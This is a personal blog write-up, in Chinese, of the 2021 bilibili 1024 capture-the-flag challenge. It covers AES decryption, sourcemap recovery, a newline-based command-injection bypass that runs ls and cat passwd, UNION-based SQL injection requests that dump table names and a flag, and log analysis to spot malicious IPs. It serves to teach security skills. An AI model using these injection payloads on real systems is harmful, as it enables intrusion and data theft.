c1ay's blog

2021 bilibili 1024挑战赛

字数统计: 2.1k阅读时长: 10 min
2021/11/04 Share

2021 bilibili 1024挑战赛

安全攻防

第一题:

1024程序员节,大家一起和2233参与解密游戏吧~
happy_1024_2233:
e9ca6f21583a1533d3ff4fd47ddc463c6a1c7d2cf084d364
0408abca7deabb96a58f50471171b60e02b1a8dbd32db156

aes ecb,密文和密钥都给了,直接写脚本即可:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import base64
import binascii
from Crypto.Cipher import AES
class AESCipher():
def __init__(self, key):
self.key = key
#self.key = key + (32-len(key)) * chr(0)
# self.key = key + (24-len(key)) * chr(0) # AES-192-ECB
self.key = key + (16-len(key)) * chr(0) # AES-128-ECB
self.BLOCK_SIZE = 16 # Bytes
self.pad = lambda s: s + (self.BLOCK_SIZE - len(s) % self.BLOCK_SIZE) * chr(self.BLOCK_SIZE - len(s) % self.BLOCK_SIZE)
#self.unpad = lambda s: s[:-ord(s[len(s) - 1:])]
def decrypt(self, enc):
enc=binascii.a2b_hex(enc)
#enc=enc.decode("hex")
cipher = AES.new(self.key, AES.MODE_ECB)
return cipher.decrypt(enc)
print AESCipher("happy_1024_2233").decrypt("e9ca6f21583a1533d3ff4fd47ddc463c6a1c7d2cf084d3640408abca7deabb96a58f50471171b60e02b1a8dbd32db156")

a1cd5f84-27966146-3776f301-64031bb9

第二题:

某高级前端开发攻城狮更改了一个前端配置项
https://security.bilibili.com/sec1024/q/

根据提示是sourceMap

下载
https://security.bilibili.com/sec1024/q/js/chunk-4871f04e.e8a41f19.js.map

通过restore-source-tree还原
在home.vue当中发现flag

mark

36c7a7b4-cda04af0-8db0368d-b5166480

第三题:

PHP is the best language for web programming, but what about other languages?
https://security.bilibili.com/sec1024/q/eval.zip

php源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
/*
bilibili- ( ゜- ゜)つロ 乾杯~
uat: http://192.168.3.2/uat/eval.php
pro: http://security.bilibili.com/sec1024/q/pro/eval.php
*/
$args = @$_GET['args'];
if (count($args) >3) {
exit();
}
for ( $i=0; $i<count($args); $i++ ){
if ( !preg_match('/^\w+$/', $args[$i]) ) {
exit();
}
}
// todo: other filter
$cmd = "/bin/2233 " . implode(" ", $args);
exec($cmd, $out);
for ($i=0; $i<count($out); $i++){
echo($out[$i]);
echo('<br>');
}
?>

preg_match$可以用%0A换行符绕过

1
https://security.bilibili.com/sec1024/q/pro/eval.php?args[0]=x%0A&args[1]=ls

mark

1
https://security.bilibili.com/sec1024/q/pro/eval.php?args[0]=x%0A&args[1]=cat&args[2]=passwd

mark

9d3c3014-6c6267e7-086aaee5-1f18452a

第四题:

sql注入

空格会影响注入,用/**/绕过空格即可

1
2
3
4
5
6
7
8
9
10
11
12
13
POST /sec1024/q/admin/api/v1/log/list HTTP/1.1
Host: security.bilibili.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 190
Origin: https://security.bilibili.com
Connection: close
Referer: https://security.bilibili.com/sec1024/q/
{"user_id":"","user_name":"1/**/union/**/select/**/1,group_concat(table_name),3,4,5/**/from/**/information_schema.tables/**/where/**/table_schema=database()#","action":"","page":1,"size":20}

mark

单引号会影响注入,用16进制编码一下

1
2
3
4
5
6
7
8
9
10
11
12
13
POST /sec1024/q/admin/api/v1/log/list HTTP/1.1
Host: security.bilibili.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 190
Origin: https://security.bilibili.com
Connection: close
Referer: https://security.bilibili.com/sec1024/q/
{"user_id":"","user_name":"1/**/union/**/select/**/1,group_concat(column_name),3,4,5/**/from/**/information_schema.columns/**/where/**/table_name=0x666c6167#","action":"","page":1,"size":20}

mark

1
2
3
4
5
6
7
8
9
10
11
12
13
POST /sec1024/q/admin/api/v1/log/list HTTP/1.1
Host: security.bilibili.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 111
Origin: https://security.bilibili.com
Connection: close
Referer: https://security.bilibili.com/sec1024/q/
{"user_id":"","user_name":"1/**/union/**/select/**/1,id,3,4,5/**/from/**/flag#","action":"","page":1,"size":20}

mark

3d5dd579-0678ef93-18b70cae-cabc5d51

第七题:

安全研究员小孙在早上的时候发现了一波异常流量在访问网站,他初步筛选了这些可疑的请求,请帮他找到所有的恶意 IP 。
flag 生成方式:找到所有的恶意 IP 后,通过通过英文逗号分隔成一个字符串后提交,系统会根据提交的 IP 正确数计算分数。
PS: 解题过程可发送至 security@bilibili.com, 标题: 1024-sec-r7-[你的 mid] 。我们会挑选3位,给予额外惊喜

题目名称是风控,在对日志流量进行审计后,并没发现有明显的攻击payload,所以我把重点放在了在某一时间点出现的ip次数,如果说在某个时间,这个ip请求多次,那么我便将他算入恶意ip之内

第一步:首先用sublime的正则处理功能将日志当中的时间(@timestamp)和ip(x_backend_bili_real_ip)提取出来

mark

第二步:将第一步提取出的481888条时间的出现次数进行计算(时间去重后只剩下302条),得到时间点和该时间点的http请求数

mark

第三步:将第一步提取的时间和ip导入数据库,以便于整理统计

1
2
3
4
5
6
7
create database bilibili1024;
use bilibili1024;
create table fengkong(id int unsigned not null auto_increment primary key,tmptime varchar(100) not null,ip varchar(100) not null);
insert into fengkong(tmptime,ip) value("2021-10-18T02:00:04+0000","gg.cej.hd.bii");
...
...
...

第四步:对某个时间出现的ip次数进行计算

规则:筛选出某一时间同一ip出现次数大于100的ip(100可能有点多了,可以进行适当的减少,例如可以从10、15、20、25…、100这样依次增加)

可以通过mysql的聚合查询+子查询实现:

calc.sql

1
2
3
select * from (select ip,count(*) as count from fengkong where tmptime="2021-10-18T02:00:03+0000" group by ip)x where x.count>100;
select * from (select ip,count(*) as count from fengkong where tmptime="2021-10-18T02:00:04+0000" group by ip)x where x.count>100;
...

编写php批量执行sql,获得结果,php代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<?php
$servername = "localhost";
$username = "root";
$password = "root";
$dbname = "bilibili1024";
$lines = file("calc.sql");
// 创建连接
$conn = new mysqli($servername, $username, $password, $dbname);
// Check connection
if ($conn->connect_error) {
die("连接失败: " . $conn->connect_error);
}
foreach($lines as $line) {
$sql = rtrim($line);
//print("$sql\n");
$result = $conn->query($sql);
if ($result->num_rows > 0) {
// 输出数据
while($row = $result->fetch_assoc()) {
echo $row['count']."\t".$row['ip']."\n";
}
} else {
}
}
$conn->close();
?>

得到结果:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
112 bfh.ff.dj.jf
106 bfh.ff.dj.jf
106 bfh.ff.dj.jf
109 bfh.ff.dj.jf
107 bfh.ff.dj.jf
110 bfh.ff.dj.jf
115 bfh.ff.dj.jf
113 bfh.ff.dj.jf
122 bfh.ff.dj.jf
137 bfh.ff.dj.jf
798 cd.baf.cae.cbc
1652 cd.baf.cae.cbc
2805 cd.baf.cae.cbc
1546 cd.bb.cai.cbh
1563 cdd.bcc.bg.bib
1520 dc.bcc.bg.bib
1577 cd.bb.cai.cbh
1566 cdd.bcc.bg.bib
1562 dc.bcc.bg.bib
1569 cd.bb.cai.cbh
1551 cdd.bcc.bg.bib
1506 dc.bcc.bg.bib
4735 cd.baf.cae.cbc
1564 cd.bb.cai.cbh
1539 cdd.bcc.bg.bib
1535 dc.bcc.bg.bib
1578 cd.bb.cai.cbh
1589 cdd.bcc.bg.bib
1568 dc.bcc.bg.bib
2461 bba.ja.cca.beg
2424 bba.ja.ccb.cbc
2578 bbb.bb.bjd.bgc
2494 bbb.bb.bjd.bgg
2448 bbb.bb.bjd.bha
2619 bbb.bb.bjd.bhc
2539 bbb.bb.bjd.bhf
2517 bba.ja.cca.beg
2525 bba.ja.ccb.cbc
2542 bbb.bb.bjd.bgc
2563 bbb.bb.bjd.bgg
2473 bbb.bb.bjd.bha
2539 bbb.bb.bjd.bhc
2427 bbb.bb.bjd.bhf
2569 bba.ja.cca.beg
2491 bba.ja.ccb.cbc
2504 bbb.bb.bjd.bgc
2566 bbb.bb.bjd.bgg
2534 bbb.bb.bjd.bha
2636 bbb.bb.bjd.bhc
2521 bbb.bb.bjd.bhf
9531 cde.ced.bbb.dd
9469 dc.bb.ii.jj
9587 jj.bdc.bbb.cc
9406 cde.ced.bbb.dd
9370 dc.bb.ii.jj
9451 jj.bdc.bbb.cc
9559 cde.ced.bbb.dd
9302 dc.bb.ii.jj
9414 jj.bdc.bbb.cc
18854 cde.ced.bbb.dd
18869 dc.bb.ii.jj
18882 jj.bdc.bbb.cc

去重后得到在某个时间点访问次数超过100的ip:

1
bba.ja.cca.beg,bba.ja.ccb.cbc,bbb.bb.bjd.bgc,bbb.bb.bjd.bgg,bbb.bb.bjd.bha,bbb.bb.bjd.bhc,bbb.bb.bjd.bhf,bfh.ff.dj.jf,cd.baf.cae.cbc,cd.bb.cai.cbh,cdd.bcc.bg.bib,cde.ced.bbb.dd,dc.bb.ii.jj,dc.bcc.bg.bib,jj.bdc.bbb.cc

但是提交后依旧提示:”恭喜您找到了大部分ip地址,请再接再厉”

mark

自己某一时间点ip出现次数大于100降低到某一时间点ip出现次数大于30后依旧是提示不够

排除法:

自己通过某些方法推测出了这道题目可能的检测规则:如果提交总ip数-错误数>=8,就算通过,会提示”恭喜您找到了大部分ip地址”,在这个检测规则的前提下,通过排除法后得到下面这13个ip肯定是对的

1
bba.ja.cca.beg,bba.ja.ccb.cbc,bbb.bb.bjd.bgc,bbb.bb.bjd.bgg,bbb.bb.bjd.bha,bbb.bb.bjd.bhc,bbb.bb.bjd.bhf,cd.bb.cai.cbh,cdd.bcc.bg.bib,cde.ced.bbb.dd,dc.bb.ii.jj,dc.bcc.bg.bib,jj.bdc.bbb.cc

但是提交了依旧只能拿10分

其他思路:

1、根据某一时间内相同设备(根据user-agent)的访问次数这个规则来选择恶意ip,但是这个方法选择的ip会非常多,提交后会出现错误

2、通过看浏览发现里面存在很多百度、谷歌、必应的爬虫请求,但是我认为爬虫不能算恶意请求,因为有时候需要对网站进行seo

3、获取敏感信息的接口:
/activity/account/check/myinfo.
/account/history.

但是这些接口并不存在越权,而且通过这种方法找到的ip和通过时间找到的ip差不多一致

CATALOG
  1. 1. 2021 bilibili 1024挑战赛
    1. 1.0.1. 安全攻防